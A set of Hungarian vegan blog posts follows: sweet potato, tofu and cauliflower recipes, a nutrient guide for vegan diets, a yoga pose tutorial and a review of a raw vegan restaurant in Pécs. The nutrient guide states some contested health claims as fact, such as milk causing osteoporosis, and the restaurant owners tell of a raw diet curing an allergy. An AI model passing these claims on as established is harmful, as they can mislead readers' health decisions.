de még édességeket, pitéket is. ;-) Magas szénhidrát tartalma ellenére én szívesen ajánlom mindenkinek, mert nagyon könnyen emészthető, magas rosttartalmú zöldségről van szó, melynek tápanyagi hasznosulnak a szervezetben, a felesleg pedig távozik a testből, és nem rakódik le zsírpárnák formájában. :-) Édes íze miatt azt hinnénk, hogy a cukorbetegeknek tiltólistás alapanyag. Ez tévedés! A diabétesszel küzdők számára egyenesen ajánlott az édesburgonya fogyasztása. (Bővebben a témáról itt olvashattok!) Vélhetően a népszerűséggel, a kínálat is nőni fog, több kereskedőtől beszerezhető lesz majd, és talán így az ára is lejjebb megy, hogy mindenki számára elérhető legyen, mert rengeteg jótékony tulajdonsága van. Nyugat-európa már itt tart! :-) Például Írországban a hagyományos burgonyafogyasztás visszaszorult, és hetente akár többször is kerül az asztalra ebből a finom, édes és csodaszép burgonyából, melyet batáta néven is kereshetünk a zöldségesnél. édesburgonya / batáta Miért hasznos tápanyagforrás az édesburgonya? "Az édesburgonya húsos, gumószerűen megvastagodott gyökere szénhidrátban és (különösen a sárga húsú fajta) béta-karotinban gazdag. C-vitamin-tartalma 15-30 mg/100 g, de tartalmaz B1, B2, B6, és E vitaminokat is. A többi zöldségféléhez képest sok, 1,5-2 g/100 g fehérje található benne, amelynek összetétele a tojáséhoz hasonló. Délkelet-Ázsiában a zsenge leveleit, hajtásait is fogyasztják, ezekben a gyökerénél is több a C-vitamin és a béta-karotin. Értékes ásványi anyagokat tartalmaz: kalcium, vas, magnézium, mangán, kálium, foszfor, nátrium, szelén, réz és cink is található benne. Egy perui kutatóközpont, a Limában működő Nemzetközi Burgonyaközpont (CIP) szakértője, Daniel Reynoso Tantalean az édesburgonyával foglalkozó tanulmányában azt állítja, hogy a batátának gazdag ásványi anyagtartalma miatt daganatmegelőző hatása is van, csökkenti a gyomorrák és a májbetegségek kockázatát és antioxidánsai, vitaminjai és proteinjei segítenek megőrizni a fiatalságot. Energiatartalma száz grammban 117 kalória, így akár a fogyókúrázók is beleilleszthetik az étrendjükbe. " Forrás: Házipatika édesburgonya-padlizsán gratin (tojás- és gluténmentes) HOZZÁVALÓK (4 személyre) - 500 g édesburgonya / batáta - 1 db nagyobb méretű padlizsán - 200 g kecskesajt - 2 dl főzőtejszín (én szóját használtam) - 1 dl tetszés szerinti tej (én rizstejet használtam) - 2-3 gerezd fokhagyma - 1 tk Himalája só, 1 kk őrölt fehér bors, 1 ek szárított oregánó, csipet őrölt szerecsendió édesburgonya-padlizsán gratin (tojás- és gluténmentes) ELKÉSZÍTÉS A burgonyát és a padlizsánt meghámozzuk, majd vékony karikákra felvágjuk. Egy jénai tálat vékonyan k ikenünk kókuszzsírral, és elkezdjük belerétegezni az édesburgonyát és a padlizsánt egymás után. Ezt megtehetjük állítva, egymás mellé téve és fektetve, egymásra rétegezve is (mint a rakott krumpli). Amihez éppen kedvünk van. ;-) állítva fektetve, rétegezve A szószhoz feltesszük a főzőtejszínt egy lábasban melegedni. Hozzáadjuk az apróra vágott (tépkedett) kecskesajtot, a tejet, és a fűszereket. Közepes lángon addig kevergetjük, míg a kecskesajt teljesen szétmálik, és egynemű öntetet nem kapunk. Amint ezt elértük, nyakon borítjuk vele a jénaiba helyezett burgonya és padlizsán szeletek. A jénait lefedjük alufóliával, és 220 °C - ra előmelegített sütőben kb. 35-40 perc alatt puhára sütjük az egytálételünket. A végeredmény egy édeskés-sajtos olaszos íz, amit nehéz abbahagyni. édesburgonya-padlizsán gratin (tojás- és gluténmentes) Táplálkozzunk, ne csak együnk! :-) Megjegyzés: Az étel könnyedén vegánosítható, vagy átalakítható egyszerű köretté, a főétel helyett. Hagyjuk el a kecskesajtot, az öntetet készítsük növényi tejből és szójából készült tejszínből, majd szórjuk meg a megsült és kész ételt sörélesztőpehellyel, sóval, frissen őrölt fekete borssal. Vagy egyszerűen csak locsoljuk meg a padlizsán- és édesburgonya szeleteket fűszeres olívaolajjal. Majd süssük készre őket. Így az egytálétel, akár köretként is szerepelhet az asztalon.
Vegán étrend, vitaminok és nyomelemek
Hogyan képes a vegán étrend a szervezetnek megfelelő mennyiségű vitamint biztosítani? Hogyan viszi be egy vegán a megfelelő mennyiségű vasat, ha nem eszik húst? Könnyebben mint hinnéd! Mindazonáltal, hogy a vegán életmód nem a táplálkozásról szól, mégis érdemes számos cikket és bejegyzést szentelni a témának, mert ez a legelső olyan társadalmi becsípődés, melyen sokan fennakadnak. A sokaság azt gondolja, hogy a vegán étrenden élők vérszegények, gyengék, betegeskednek. Holott a tapasztalat az ellenkezőjét mutatja. Milyen tápanyagok bevitelére kell figyelni vegán étrend esetén? Az amerikai Andrews University Táplálkozástudományi Tanszék igazgatója, Winston Craig egy tanulmányban írta meg, hogy a tudatosan összeállított vegán étrend magasabb arányban tartalmaz C és E-vitamint, magnéziumot és vasat, folsavat valamint rostokat, ugyanakkor kisebb a B12 és D-vitamin, a kalcium és cink, a telített zsír, valamint a kalória tartalma , mint a mindenevő étrendnek. Sok olyan támadás éri a vegán étrendet, miszerint nem lehet teljes életet élni hús, tojás és tejtermékek nélkül. Ugyanakkor kutatások sora bizonyította – és többek között az Amerikai Dietetikai Szövetség, valamint Kanadai Dietetikusok is kijelentették – , hogy nemtől és kortól, valamint életciklustól függetlenül egészséges és teljes értékű életet lehet élni vegán étrend esetén is. Tudományosan elfogadott tény, hogy a vegán táplálkozás jobb minőségű zsiradékot, a belek számára kielégítő mennyiségű rostot, a testi valamint mentális munkához szükséges komplexebb szénhidrátokat tartalmaz, mint a mindenevő étrend. Vegán étrend és a vitamin bevitel Az egészséges szervezet egyik pillére, a megfelelő mennyiségű és változatos vitamin bevitel. Életvitelünktől és életciklusunktól függően van szüksége szervezetünknek különböző arányban vitaminokra és nyomelemekre. Vegyük sorba először a vitaminokat, valamint azok növényi forrásait. Vegán étrend és az A-vitamin: A zsírban oldódó A-vitamin nagyon fontos szerepet tölt be a sejtek egészséges működésében, a csontnövekedésben, valamint gátolja a sejtek deformálódását, roncsolódását. Ajánlott napi bevitel 900 és 1500 ug között mozog, de terhesség és szoptatás esetén 2-2,5 mg-ra is megnövekedhet ez az igény. Magas A-vitamin tartalmú zöldségek: főtt édesburgonya (11,5mg/100g), főtt sárgarépa (10,2mg/100g), leveles zöldségek (6mg-14mg/130g), sült tök (6,7mg/100g), aszalt barack (7,6mg/100g), sárgadinnye (2mg/100g), kaliforniai paprika (1,8mg/100g), valamint a búzafű, spirulina, grapefruit, goji, chlorella alga, mangó, papaja Vegán étrend és a B-komplex: B-komplexnek hívják azt a vízben oldódó vitamincsoportot, mely az összes B-vitamint tartalmazza: B1 (thiamin), B2 (riboflavin), B3 (niacin), B5 (pantoténsav), B6 (piridoxin), B7 (biotin), B9 (folsav) és B12 (kobalamin). Ezek mindegyikére szükségünk van és mindegyik vitaminnak megvan a maga funkciója a szervezetben. Ugyanakkor együttesen járulnak hozzá a sejtek optimális növekedéséhez és osztódásához, támogatják az anyagcserét, egészségesen tartják a bőrt, valamint erősítik az immunrendszert és idegrendszert, védenek a stressz káros hatásai ellen. Ha B-komplex táplálékkiegészítőt szedünk figyeljünk oda, hogy fénytől és fagytól védve tároljuk, mivel a B2 fény hatására, illetve a B6 fagy hatására veszti el hatását. Érdemes még megjegyezni, hogy a B6 felszívódását segíti a B12. A sörélesztő tartalmazza az összes B-vitamint a B12 aktív típusán kívül. Növények, melyek tartalmazzák a B-komplex sort: dió, leveles zöldségek, gabonafélék, banán Vegán étrend és a B12-vitamin: A B12 egy vízben oldódó, baktériumok által termelt vitamin, mely növényi étrenddel elenyésző mértékkel vihető csak be. A B12 hozzájárul a normális idegműködéshez, közrejátszik a vörösvértestek kialakulásában és a DNS szintézisben is többek között. Tartós hiánya visszafordíthatatlan idegi alapú károsodást okozhat és nagyon fontos leszögezni, hogy B12 hiányban nem csak vegánok szenvedhetnek, hanem a mindenevők is. Aki nem tudja úgy megtervezni az étkezését, hogy elegendő B12-t vigyen be, annak B12 készítményt ajánlott szedni, melynek vásárlásakor érdemes odafigyelni, hogy a vitamin valamely aktív – a szervezet által felhasználható – formuláját tartalmazza a készítmény. Ilyen a hidroxo-kobalamin és ciano-kobalamin. Étrend kiegészítő vásárlása esetén a ciano-kobalamin tartalmút válaszd, mert azt a típust kifejezetten baktériumkultúrákból nyerik ki. Ez az egyetlen olyan vitamin típus melyet májunk elraktároz és az utolsó bevitel után még évekig adagolja azt a szervezetnek igény szerint. A felnőtt napi szükségletet 2 és 3 ug között határozták meg. (a B12 vitaminnak a későbbiekben egy teljes bejegyzést szentelek) A B12 aktív formáját minimálisan tartalmazó ételek és növények: kovászos uborka, savanyú káposzta, egyéb erjesztett ételek, bio gazdálkodásból származó mosatlan gyümölcsök és zöldségek. Vegán étrend és a C-vitamin: A vízben oldódó aszkorbinsav – vagy ahogy többen ismerik C-vitamin – nélkülözhetetlen vitamin típus szervezetünk számára. Vegán étrend esetén kifejezetten fontos a C-vitamin optimális napi bevitele, ugyanis segíti a vas felszívódását. Erős antioxidáns hatása miatt, csökkenti a degeneratív illetve a szív és érrendszeri betegségek kialakulásának kockázatát. Napi 120mg C-vitamin bevitele ajánlott egy egészséges szervezetnek, de betegség, nehéz fizikai munka, megerőltető sporttevékenység, dohányzás, illetve stresszes munka esetén napi 1000mg-ra emelhető a napi adag. A szervezet által fel nem hasznát C-vitamin kiürül oxálsav formájában, mely a húgykő egyik alkotóeleme, így magas C-vitamin bevitele estén sok vizet ajánlatos fogyasztani. Vigyázz a C-vitaminnal, mert 40° felett elbomlik! Így megfázás esetén nincs értelme a citromot forró teába tenni, hacsak nem az íze miatt teszed azt. Magas C-vitamin tartalommal bíró növények: paprika (120-300mg/100g), guáva (228,3mg/100g), kelbimbó (120mg/100g), kivi (92,6mg/100g), brokkoli (89,2mg/100g), eper (58,8mg/100g), papaja (60,9mg/100g), narancs (53,2mg/100g), mangó (60mg/100g), csipkebogyó, mandarin, citrom, grapefruit, mángold, spenót, áfonya, stb. Vegán étrend és a D-vitamin: A zsírban oldódó D-vitamin a másik olyan vitamin, melyet nagyon csekély mennyiségben lehet vegán étrenddel bevinni. Érdemes D-vitamin táplálékkiegészítőt szedni, ugyanakkor bőrszíntől függően napi 10-40 perc napozás is elegendő D-vitamint szabadít fel a szervezetben. Az utóbbi oka, hogy az UV sugárzás hatására a bőrsejtek alatt elhelyezkedő koleszterin D vitaminná alakul, majd sejtjeinkbe kerülve pedig stabilizálja örökítő anyagunkat a DNS-t, ezzel segítve a szervezetet a súlyos betegségek kialakulásával szemben. D-vitamin hiány következtében gyengül az immunrendszer, erősödik a depresszióra való hajlam, valamint fokozhatja a rákos betegségek és a szív- és érrendszeri betegségek kialakulásának kockázatát. Emellett a D-vitamin az egyik legfontosabb vitamin a terhes nők számára is, mivel fontos szerepet játszik az idegrendszer normális fejlődésében, valamint a sejtfejlődés és az immunrendszer működéséhez. Valamint ez az a vitamin, mely a bélből felvett kalciumot beépíti a csontokba és a fogazatba. A D-vitamin bevitel felső határát 1-3 éves kor között 2500NE-ben (62,5ug), 4-8 éves kor között 3000NE-ben (75ug), míg a többi korosztály esetében 4000NE-ben (100ug) maximalizálták. A napi minimumot pedig kb. 600NE-ben azaz 15ug-ban határozták meg. D-vitamint tartalmazó növények és ételek: gombák fajtától függően (5-12ug/100g), lenmagolaj, kakaóbab Vegán étrend és az E-vitamin: A zsírban oldódó E-vitamin egy könnyedén bevihető vitamin típusnak számít, mely antioxidáns hatású, erősíti az immunrendszert – kifejezetten idős korban –, óvja a szív és érrendszert, gátolja a sejtfalroncsolódást, valamint jótékony hatással bír az agyi működésre. Az ajánlott napi mennyiség felnőttek számára 15mg. Magas E vitamin tartalmú növények: főtt spenót (2,1mg/100g), mángold (3,2mg/180g), mandula (26,2mg/100g), mogyoró (4,3mg/28g), pirított napraforgó mag (36,3mg/100g), egyéb magvak és diófélék, avokádó (2,1mg/100g), olíva olaj (14,4mg/100g), kivi (1,5mg/100g), főtt brokkoli (1,5mg/100g), búzacsíra, teljes kiőrlésű gabonák, mangó, paradicsom, spárga Vegán étrend és K-vitamin: A zsírban oldódó K-vitaminnak nagy szerepe van a véralvadás optimális működésében, támogatja a csontok egészséges növekedését és erősíti azokat. K-vitamin hiány esetén egy egészen kicsi seb is sok ideig vérezhet, illetve egy kisebb ütés is komoly véraláfutásos fekete foltot okozhat a testen. Az ajánlott napi mennyiség 90-120?g között mozog felnőttek számára. Magas K vitamin tartalmú növények: chili por (105,7?g/100g), szárított bazsalikom (1714?g/100g), friss petrezselyem (65,6?g/5g), szárított zsálya (85,6?g/5g), egyéb zöld-fűszerek, főtt fodros kelkáposzta (817?g/100g), spenót (888?g/130g), mángold (572?g/130g), kerti saláta (48?g/130g), egyéb leveles zöldségek, brokkoli (217?g/100g), újhagyma (207?g/100g), zeller (29,6?g/100g), főtt kelbimbó (140,3?g/100g), uborka (76,7?g/100g), zöldborsó, fehérrépa, olívaolaj (60,2?g/100g), aszalt szilva (69,5?g/100g), aszalt áfonya (96?g/174g), aszalt barack (36,8?g/174g), egyéb aszalt gyümölcsök, erjesztett ételek, stb. Vegán étrend és a nyomelem bevitel Most vegyük sorra azokat az ásványi anyagokat, vagy másnéven nyomelemeket, melyek ugyancsak fontosak szervezetünk számára. Vegán étrend és cink bevitel: A cink fontos szerepet játszik immunrendszerünk erősítésében és könnyedén pótolható a vegán étrendet követők számára is. Fontos tápanyaga a szervezetnek, mivel többek között segíti a sebgyógyulást. A versenysport, a stressz, a tartós dohányzás és az alkoholfogyasztás azonban növeli a szervezet cink igényét. Az állati eredetű cink jobban hasznosul mint a növényi forrásból bevitt, szervezetünk napi igénye 8-13mg körül van életciklustól függően. Magas cinktartalmú növényi ételek: aszalt sárgabarack (1mg/100g), aszalt őszibarack (0,78mg/100g), aszalt szilva (0,75mg/100g), mazsola (0,66mg/100g), aszalt füge (0,55mg/100g), datolya (0,29mg/100g), egyéb aszalt gyümölcsök, avokádó (0,68mg/100g), kínai kel (3,75mg/100g), citronella (2,23mg/100g), aszalt paradicsom (1,99mg/100g), főtt shiitake gomba (1,33mg/100g), borsó (1,19mg/100g), valamint lencse, zabpehely, teljes kiörlésű gabonák, hüvelyesek, diófélék, magvak, kakaóbab, brokkoli Vegán étrend és a kalcium bevitele: Igyál sok tejet, attól erősödnek a csontjaid. - mondták nagyszüleink. Ehhez képest a legtöbb tejet Amerikában, Angliában, Finnországban és Svédországban isszák, a csontritkulás mégis ezekben az államokban a legelterjedtebb. Kutatások bizonyították, hogy a csontritkulás összefügg a túlzott tejfogyasztással. Az állati eredetű fehérjedús ételek – húsok, tejtermékek – savassá teszik a szervezetet, melyet a szervezet kalciumelvonással igyekszik semlegesíteni. Ezt a kalciumot a csontokból és a fogakból vonja el és a vizelettel ürül. Mindezen hatásokat ellensúlyozni lehet magas kalciumtartalmú növényi étrenddel és D-vitaminnal, mely a kalcium felszívódását segíti. Gyerekkorban napi 1200mg körül, felnőtt korban 800-1000mg körül van az ideális kalcium bevitel. Magas kalciumtartalommal az alábbi növények bírnak: főtt brokkoli (118mg/100g), főtt spenót (136mgmg/100g), káposzta (232mg/100g), kelpáposzta 205mg/100g), egyéb leveles zöldségek, tarlórépa (190mg/100g), cékla zöldje (117mg/100g), újhagyma (73mg/100g), póréhagyma (59mg/100g), főtt zöldbab (55mg/100g), articsóka (44mg/100g), édes burgonya (38mg/100g), répa (33mg/100g), rebarbara (86mg/100g), fekete ribiszke (55mg/100g), narancs (40mg/100g), füge (35mg/100g), kivi (34mg/100g), továbbá a mák, napraforgómag, szezámmag, petrezselyem, mandula, amaránt, köles, spirulina, chia mag, amaránt, melasz, baobab gyümölcs és számos egyéb zöldség és gyümölcs tartalmaz kalciumot Vegán étrend és magnézium bevitel: A magnézium segíti az idegrendszer működését, védi a szív és érrendszert, segít megelőzni a szívbetegségeket és csökkenti az agyvérzés kockázatát. Ez az ásványi anyag sokkal nagyobb mennyiségben található növényi eredetű táplálékban mint állati eredetűben. Emelkedett magnézium igény lép fel terhesség, versenysport és lábadozó szervezet esetében. Felszívódását a B6 vitamin segíti, az ajánlott napi mennyiség 300-400mg körül van. Fogyókúra és alkoholizmus esetén is megnövekedik a szervezet magnézium igénye, illetve magnézium hiány léphet fel, mely ingerlékenységgel, szorongással, enyhébb alvászavarokkal jár. Magas magnézium tartalmú növények: nyers spenót (79mg/100g), főtt fodros kel (76mg/38g), főtt mángold (152mg/38g), egyéb leveles zöldségek, szezámmag (252mg/59g), tökmag (534mg/100g), mandula (196mg/59g), kesudió (177mg/59g), egyéb magvak és diófélék, főtt fehérbab (92mg/172g), főtt csicseriborsó (80mg/172g), főtt feketebab (92mg/172g), egy babfélék és hüvelyesek, quinoa (120mg/195g), barnarízs (44mg/100g), bulgur (60mg/195g), zab (28mg/195g), avokádó (29mg/100g), banán (27mg/100g), aszalt füge (68mg/100g), aszalt szilva (44mg/75g), aszalt sárgabarack (40mg/75g), egyéb aszalt gyümölcsök, tiszta fekete csokoládé (327mg/100g), valamint sütőtök, hínár, brokkoli, kávébab, gyökérzöldségek Vegán étrend és a vas bevitel: A vas az oxigénszállításért felel a szervezetben és alkotóeleme a hemoglobinnak, így ha nincs elég a szervezetben akkor vérszegénység alakul ki. Sokan “féltik” a vegánokat a vashiánytól, mivel az a tévhit alakult ki, hogy a vegetáriánus vagy vegán étrendet követők komoly vashiánnyal küszködnek. Ez általánosítva tévedés. Még annak ellenére is, hogy a húsokból bevitt vas nagyobb hatékonysággal szívódik fel, mint a növényi alapú. (40% kontra 10% az arány) Ugyanakkor a növények magas szerves sav – mint pl. aszkorbinsav – és flavonoid tartalma, valamint a szervezet magas szinten tartott aszkorbinsav szintje is segíti a vas felszívódását. (Az előző megállapításokkal kapcsolatban nem találtam semmilyen kutatási eredményt.) Az emberek vasigénye nagyban függ nemüktől, életciklusoktól, életvitelüktől és koruktól. Míg a férfiaknak napi 8mg körüli a vasigényük, addig a nőknek serdülő kortól 14-15mg-ra növekszik. A gyermek szervezet vas igénye sem marad el túlzottan a felnőtt férfiakétól a maga 7-8mg-jával. Vas tartalommal bíró növényi ételek: tökmag (15mg/100g), napraforgónap (1,98mg/100g), szezámmag (4,14mg/100g), egyéb magvak és diófélék (5-6mg/100g), őrölt kakaóbab (17mg/100g), tofu (2,7mg/100g), kucsmagomba (12,18mg/100g), főtt shiitake gomba (5,4mg/66g), laskagomba (6,2mg/66g), egyéb gombák, aszalt sárgabarack (6,31mg/100g), aszalt füge (3,06mg/119g), mazsola (4,43mg/119g), olívabogyó (3,32mg/119g), főtt lencse (6,6mg/179g), főtt szójabab (8,82mg/179g), főtt feketebab (3,6mg/179g), főtt pinto bab (3,6mg/179g), egyéb hüvelyes növények, quinoa (2,8mg/185g), zabpehely (2,16mg/185g), bulgur (1,8mg/185g), barnarizs (1,9mg/185g), köles (1,08mg/185g), valamint egyéb gabonák, főtt spenót (6mg/180g), főtt mángold (3,96mg/180g), kelkáposzta (1,08mg/180g), szeder (2,59mg/140g), bodza (2,56mg/140g), málna (1,7mg/140g), eper (1,08mg/140g), egyéb erdei gyümölcsök, kókusz (3,32mg/100g), póréhagyma (2,1mg/100g) rukkola (1,46mg/100g), melasz, mák, szilva, körte, retek, brokkoli, avokádó, spárga, cékla, birsalma, citrom, szőlő, sárgadinnye, banán, stb. Vegán étrend és egyéb tápanyagok Vegán étrend, az omega-3 és egyéb zsírsavak Az omega-3 zsírsavak idegi alapú betegségek, szív és érrendszeri betegségek, valamint gyulladások kialakulásának megelőzésében játszanak fontos szerepet. Az omega-3 egy telítetlen zsírsav, melynek a szervezet által elvárt napi minimális igényét fél mokkáskanálnyi lenmagolaj fedezi. Omega-3 források: hidegen préselt lenmagolaj (53449mg/100g), (a lenmag kb. 2x több omega-3-at tartalmaz mint a halolaj), chia mag, kínai egres, vörösáfonya, sárgarepce, fekete málna, porcsin, diófélék, leveles zöldségek Omega-6 források: repceolaj, olívaolaj, földimogyoróolaj, tökmagolaj, napraforgóolaj, ligetszépe olaj, borágó olaj, kendermag olaj Vegán étrend és a rosttartalom A rostok szénhidrátok, melyek nem emésztődnek meg teljesen és nem szívódnak fel. Lassítják és gátolják a toxinok valamint a szükségtelen anyagok felszívódását, gyorsítják az emésztést és mozgásban tartják a bélrendszert. Rostokat semmilyen állati eredetű étel és semmilyen finomított gabona (finomliszt) nem tartalmaz. Források: https://ods.od.nih.gov http://www.ncbi.nlm.nih.gov https://nutritionj.biomedcentral.com/ http://nutritionfacts.org http://jissn.biomedcentral.com/ http://www.healthaliciousness.com www.oeti.hu
Javítsd az emésztésed! - szabadulj meg az emésztési problémáktól
2016. február 8. Élj harmóniában
A mai rohanó világban a legtöbb embernek rossz az emésztése. Néhány egyszerű ájurvédikus elvet, ha bevezetsz az életedbe, akkor sokat tehetsz azért, hogy megszabadulj az emésztési problémáktól. Nagyon hasznos, ha egyéni ájurvédikus alkatodnak megfelelő ételeket fogyasztasz. Ha szeretnél az ájurvédáról többet tudni, néhány korábbi bejegyzésben részletesebben is írtam. Emésztés javítása
Hagymás-tofus édesburgonya
A következő ételnek számomra az a különlegessége, hogy selyem tofuval készült. Magyarországon jellemzően nem elterjedt a selyem tofu, bár vannak helyek, ahol ezt is be lehet szerezni. A selyem tofunak találó a neve, hiszen rendkívül lágy állaga és selymes íze van, mint egy pudingnak. Főként nyáron szoktak ilyet készíteni, de eleve légmentesen zárt műanyag dobozokban kerül forgalomba, így felbontás nélkül akár fél évet is eláll a hűtőben. Selymes, szilárdabb puding-állagából adódik, hogy leginkább cukrásztermékekhez használják. Remek krémeket lehet belőle készíteni sütemények töltésére. Most azonban mégis maradtam a főételeknél, s batátával sütöttem össze. A batáta is lágyabb növény, jól passzolt a kettő, a tofun túl a hagymákkal és kakukkfűvel megfűszerezve egyszerű de fenséges ételt kapunk. Könnyen kedvencünkké válhat.
A recept:
Hozzávalók:
- 3-4 db batáta (édesburgonya)
- 1-2 db lila hagyma
- 1 selyemtofu
- 1/2 póréhagyma
- 1 selyemtofu
- só
- kakukkfű
Elkészítés:
Az édesburgonyát megpucoljuk, hosszabb hasábokra vágjuk. Minimális vízen, enyhén megsózva kicsit megpároljuk. Közben a hagymákat és a selyemtofut felszeleteljük nagyobb darabokra.
A félkeményre puhult édesburgonyát leszűrjük, kakukkfűvel és kevés sóval összeforgatjuk.
Egy tepsit sütőpapírral vagy alufóliával kibélelünk, beletesszük a megfűszerezett batátagerezdeket, rászórjuk a feldarabolt tofut és hagymákat. Kb. 20 perc alatt készre sütjük. Köretnek vagy önálló ételnek is megfelel. Selyemtofu helyett füstölt tofut vagy bármilyen más tofut is használhatunk. (Angliában valahogy könnyebb beszerezni a selyemtofut.)
Köles-kukorica kása-torta mogyoróvajjal és karoböntettel
2016. február 4. Mindennapi ételeink
Kaptunk a Biorganik-tól instant kásákat kipróbálási célból. Most az elsőből készítettem egy finom édességet. Hozzávalók: 10 dkg instant köles-kukoricakása 3 ek. gyümölcscukor 3 ek. darált földimogyoró (opcionális) kb. 1-2 dl forró víz -- 6 ek. mogyoróvaj -- 6 evőkanál víz 3 evőkanál karobpor 3 evőkanál növényi tejpor 2 evőkanál kókuszolaj 3-4 evőkanál datolyaszirup 3-4 evőkanál víz Elkészítés: Az instant kását leforrázzuk a vízzel és állni hagyjuk. Majd egy tálcán kisimítjuk, rákenjük a mogyoróvajat, és az előzetesen elkészített karobszószt. A szószt így készítjük: a vizet felforraljuk, beletesszük a tejport és a karobot, majd a szirupot is.
Szezámmagos kínai rántott karfiol
Ebben az elidegenedett világban a társasházi lakók szinte semmit nem tudnak egymásról. Legfeljebb azt, hogy a szomszéd mikor süti azt a tetves bundás kenyeret! Na, és valami hasonló lehet az helyzet az alábbi étellel is, illetve bármivel, amiben sült fokhagyma szezámolajjal és szójaszósszal keveredik. Ebből kifolyólag ez az elegy különösen alkalmas éhségsztrájkolók szívatására. Amúgy meg a végeredmény világbajnok kategóriás, még ha a szomszéd meg is gyanúsít a távol-keleti szaghatások alapján, hogy közünk van Mirci nevű perzsamacskája eltűnéséhez. Beszerzendő: 1/2 fej karfiol 1/2 csésze csicseriborsó- vagy fehérliszt 1/2 csésze szójatej (pocsolyaízű natúr, nem valami édesített gyász!) 1 ek sütőpor 1 ek fokhagymapor 4 dl étolaj 1 ek szezámolaj 2 gerezd fokhagyma 1/2 csésze szójaszósz 2 ek rizs- vagy fehérborecet 1 ek barnacukor 2 ek chiliszósz 1 ek kukoricakeményítő 1 ek szezámmag 2 szál zöldhagyma A lisztet, a szójatejet, a sütőport és a fokhagymaport egy tálba lötyböljük, majd csomómentesre keverjük. (Ez abban különbözik a palacsintatésztától, hogy nem az.) A rózsáira bontott karfiolt beletuszkoljuk a tésztába, hogy mindenütt befedje, majd forró olajban kisütjük. Egy wokban (ami hétszentség, hogy nincs otthon, de a receptben így érhetjük el a szakszerűség látszatát) szezámolajat hevítünk, hozzáadjuk az összetört fokhagymát. Egy percig pároljuk, majd hozzáadjuk a szójaszószt, az ecetet, a barnacukrot és a chiliszószt, majd miután jól összekevertük, elkeverjük benne a kukoricakeményítőt. Ha besűrűsödött, hozzáadjuk a kisütött karfiolt, és cefetül elkeverjük a szósszal. Szezámmaggal és vékonyra vágott zöldhagymával dekoráljuk, rizsával tálaljuk.
Tégy a gerinced egészségéért! - Szupta pavanamuktászana (szeleket felszabadító póz)
2016. január 28. Élj harmóniában
A Szupta pavanamuktászana (szeleket felszabadító póz) az egyik legjobb emésztést javító jógapóz. Nagyon jól átma sszírozza a belső szerveket, beleket, gyomrot, májat, hasnyálmirigyet. Serkenti a bélműködést és az emésztést. Azáltal, hogy jól átmasszírozza a beleket, megakadályozza a székrekedést. Eltávolítja a felesleges gázokat a belekből, n em véletlenül szeleket felszabadító póz a neve. Ez egy kiváló jógapóz arra, hogy a belső szerveidet felfrissítsd, továbbá ez az ászana nagyon kedvezően hat a hát, deréktáji szakaszban lévő fájdalmak, feszültségek enyhítésére is. Fekvő pozíció lévén segít az elme nyugalmát is és könnyen kivitelezhető bárki számára. Hogyan végezd el? Helyezkedj el térdelőtámaszban hanyatt fekvésben, savászanában (a savászana leírását és kivitelezést itt találod) - Nyújtsd ki a lábakat a magasba, majd h ajlítsd be a térdeket. - A jobb lábadat húzd a hasad fölé -simítsd a combodat a hasadra. - A kezeddel karold át a behajlított lábad. - A bal lábadat nyújtsd ki a talajon - aktívan nyújtózkodj a sarkaddal, próbálj pipálni a kinyújtott lábaddal. - A kezekkel, kezd el finoman húzni a behajlí tott lábad a hasad irányába. - A keresztcsontodat told a talaj irányába, tartsd lent a matracon. - Emeld el a fejed és próbáld közelíteni a térdedhez. - Tartsd ki a jógapózt néhány légzésig. Próbálj hosszan, mélyen lélegezni és figyeld, ahogy a légzésed átmasszírozza a belső szerveidet. - Kijövetelnél engedd vissza a fejed a talajra, engedd el a lábad és nyújtsd ki. V égezd el a gyakorlatot a másik oldalra is - húzd hasra a bal láb ad és nyújtsd ki a jobb lábad. Végül mindkét lábadat húzd a hasad fölé - a keresztcsontod továbbra is stabilan tartsd lent a talajon. Emeld meg a fejed és próbálj az arcoddal közelebb kerülni a térdedhez, mintha egy puszit akarnál a térdedre adni:) Ebben a pózban kiegészítésként belevihetsz egy kis dinamikát is. Próbálj előre és hátra gördülni a gerinc vonalában. Egy másik nagyon jó kis gyakorlat, amivel ha nincs éppen kéznél egy masszőr, átmasszírozhatod a derekadat, hátadat. Ahogy hasra húzod mindkét lábad, ha ebben a pózban jobbra-balra kezdj gördülgetni. A jobbra balra hintázás közben, ha elkezded a térdeket egyre közelebb húzni a a derekadat tudod átmasszírozni, ha távolítod a térdeket, kezded kinyújtatni a karjaidat- azzal len tebb viszed a masszázst a keresztcsont irányába, akár a farizom felső részét is meg tudod így masszírozni. A kitartás alatt: kilégzéssel húzd mindig kicsit közelebb a behajlított lábat a hashoz és a belégzéssel nyújtózz a sarkaddal. Kijövetelnél tedd vissza a fejed a talajra, engedd el a lábakat és tedd vissza a talajra, majd nyújtsd ki mindkét lábad. Ha nem éred el a lábad, akkor használj heveder, amit a lábszárakon vezess keresztül. Amennyiben gond van a nyakaddal (pl. nyaki porckorongsérv) akkor a fejet ne emeld el a talajról! Ne csináld a pózt, menstruáció és terhesség idején.
Nyers vegán Natúr Ételbár – Pécs
A Natúr Ételbár, nem csak Pécs egyetlen nyers vegán étterme, hanem Pécs egyetlen vegán és vegetáriánus étterme is egyben. Pécsen jártam feleségemmel és szokásunkhoz híven a Happy Cow alkalmazás segítségével rákerestünk a környéken fellelhető vegán éttermekre. Csak egy helyet dobott ki az applikáció, az pedig a Natúr Ételbár volt. A Natúr Ételbár nem csak vegán, hanem nyers vegán is egyben, és nem csak a környék egyetlen nyers vegán, hanem a környék egyetlen vegán és vegetáriánus étterme is egyben. Szerda este toppantunk be hozzájuk és egy kis beszélgetés után láttunk neki a vacsorának. De mielőtt kitérek röviden a finomságokra, hadd mutassam be kicsit az éttermet. A pécsi Natúr Ételbár története 2014 nyarán nyílt Pécs első nyers vegán étterme, melyet Miki és felesége Tímea vezet. Ők 2011-ben váltottak részben nyers étkezésre, amikor Tímea várandós lett és a nyers ételeken kívül nem nagyon kívánt mást. Zárójelben jegyezték meg, hogy a nyers koszt meggyógyított Timinek egy olyan allergiát, mellyel az orvosok évek óta nem tudtak mit kezdeni. A számos pozitív hatás elemi erővel hozta magával az igényt, hogy ezt mással is megoszthassák, így ezzel a motivációval nyitották meg a Natúr Ételbárra hallgató nyers vegán éttermüket Pécsett. “Mi húst nem eszünk már évek óta és nagyon örülünk neki, hogy a kislányunk sem. Egyébként vegetáriánusok vagyunk, de az étkezéseink 70-80%-át nyers ételek teszik ki. Rajtunk kívül két munkatárs dolgozik az étteremben, akik közül az egyik vegán.” – mesélték Mikiék 